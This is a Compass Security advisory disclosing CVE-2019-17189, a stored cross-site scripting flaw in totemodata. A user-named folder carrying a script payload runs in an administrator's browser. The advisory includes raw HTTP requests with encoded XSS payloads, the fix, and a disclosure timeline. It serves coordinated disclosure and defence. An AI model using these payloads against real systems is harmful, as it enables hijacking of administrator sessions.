################################################################################ # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ################################################################################ # # Product: totemodata # Vendor: totemo ag # CSNC ID: CSNC-2019-021 # CVE ID: CVE-2019-17189 # Subject: Stored Cross-Site Scripting (XSS) # Risk: High # Effect: Remotely exploitable # Authors: Fabio Poloni # Date: 01.10.2019 # ################################################################################ Introduction: ------------- totemodata[1] is a solution to transfer files securely. Compass Security identified a stored cross-site scripting (XSS) from users to administrators. Affected: --------- Vulnerable: * totemodata 3.0.0_b936 Not vulnerable: * totemodata 3.0.0_b1005 No other version was tested, but it is believed for the older versions to be also vulnerable. Technical Description: ---------------------- A user can create a folder using an XSS payload (

) as the name: POST /drive/drive.xhtml HTTP/1.1 Accept: application/xml, text/xml, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Faces-Request: partial/ajax X-Requested-With: XMLHttpRequest Content-Length: 631 Cookie: primefaces.download=null; oam.Flash.RENDERMAP.TOKEN=83xhft4df; JSESSIONID=7AE12EDEDB2B1252DEB9A3323B31DAB6 Connection: close javax.faces.partial.ajax=true &javax.faces.source=dialogForm_j_id_g2_3_fileName &javax.faces.partial.execute=dialogForm_j_id_g2_3_fileName &javax.faces.partial.render=dialogForm_j_id_g2_3_actionButton+dialogForm_j_id_g2_3_fileName &javax.faces.behavior.event=valueChange &javax.faces.partial.event=change &dialogForm_j_id_g2_3_fileName=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e &dialogForm_j_id_g2_r_filterFolders= &dialogForm_j_id_g2_28_autoCompletePerson_input= &dialogForm_j_id_g2_28_autoCompletePerson_hinput= &dialogForm_SUBMIT=1 &javax.faces.ViewState=ZJki9C9J%2FWVdTSRqijjD6JDwkHp9vF3Jlin7Hz64iJS6PD7O Server accepts as expected: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: oam.Flash.RENDERMAP.TOKEN=83xhft4dg; Path=/; Secure; HttpOnly Pragma: no-cache Cache-control: no-cache Expires: -1 Content-Type: text/xml;charset=UTF-8 Date: Mon, 17 Jun 2019 12:35:33 GMT Connection: close Content-Length: 1554 [CUT BY COMPASS] [CUT BY COMPASS] [CUT BY COMPASS] Interestingly if requesting the folder tree view in the admin interface: POST /smftg/dynamic/folderContentForTree.jsp?node=%2Fhome%2Ffabio.poloni%40compass-security.com_UUID_26_1 HTTP/1.1 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=17A7B68604DEF2101643FE651C03AD17; oam.Flash.RENDERMAP.TOKEN=83xhft4dl; JSESSIONID=7AE12EDEDB2B1252DEB9A3323B31DAB6 Connection: close Cache-Control: max-age=0 Content-Length: 0 The payload will be encoded as it should be: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 876 Date: Mon, 17 Jun 2019 12:37:41 GMT Connection: close [CUT BY COMPASS] However, requesting the folder summary: POST /smftg/dynamic/folderSummary.jsp?folderPath=%2Fhome%2Ffabio.poloni%40compass-security.com_UUID_26_1%2F%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=17A7B68604DEF2101643FE651C03AD17; oam.Flash.RENDERMAP.TOKEN=83xhft4dm; JSESSIONID=7AE12EDEDB2B1252DEB9A3323B31DAB6 Connection: close Content-Length: 0 Will result in an unencoded payload which will then be executed in the context of the administrator: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 2092 Date: Mon, 17 Jun 2019 12:37:49 GMT Connection: close [CUT BY COMPASS] Workaround / Fix: ----------------- All user-input should be encoded at any time, also a Content-Security Policy (CSP) should be set to prevent execution of inline JavaScript. As a totemodata customer, please update your installation to the latest version. Timeline: --------- 2019-06-17: Discovery by Fabio Poloni 2019-07-11: Initial vendor notification 2019-07-11: Initial vendor response 2019-07-22: Vendor confirmed vulnerability is patched 2019-09-26: Patch confirmed 2019-10-02: CVE requested 2019-10-05: CVE assigned: CVE-2019-17189 2019-10-21: Coordinated public disclosure date References: ----------- [1] https://www.totemo.com/en/solutions/secure-file-transfer

Name:
Ort:	/home/fabio.poloni@compass-security.com_UUID_26_1/